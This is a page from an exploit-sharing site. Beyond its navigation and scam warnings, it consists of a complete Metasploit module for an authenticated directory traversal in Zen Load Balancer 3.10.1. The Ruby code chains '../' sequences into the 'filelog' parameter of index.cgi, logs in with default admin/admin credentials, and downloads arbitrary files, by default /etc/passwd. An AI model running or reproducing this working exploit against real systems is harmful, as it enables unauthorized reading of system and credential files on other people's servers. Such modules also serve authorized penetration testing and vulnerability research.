0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zen Load Balancer 3.10.1 - Directory Traversal Exploit
[##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Zen Load Balancer Directory Traversal",
'Description' => %q{
This module exploits a authenticated directory traversal
vulnerability in Zen Load
Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
properly handling 'filelog='
parameter which allows a malicious actor to load arbitrary file path.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Basim Alabdullah', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'References' =>
[
['EDB', '48308']
],
'DisclosureDate' => "Apr 10 2020"
))
register_options(
[
Opt::RPORT(444),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
OptString.new('FILEPATH', [false, 'The name of the file to
download', '/etc/passwd']),
OptString.new('TARGETURI', [true, "The base URI path of the
ZenConsole install", '/']),
OptString.new('HttpUsername', [true, 'The username to use for
the HTTP server', 'admin']),
OptString.new('HttpPassword', [false, 'The password to use for
the HTTP server', 'admin'])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "../" * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.cgi'),
'vars_get'=>
{
'id' => '2-3',
'filelog' => "#{traversal}#{filename}",
'nlines' => '100',
'action' => 'See logs'
},
'authorization' =>
basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
}, 25)
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
print_good("#{peer} - Downloaded #{res.body.length} bytes")
path = store_loot(
'zenload.http',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end
# 0day.today [2024-11-15] #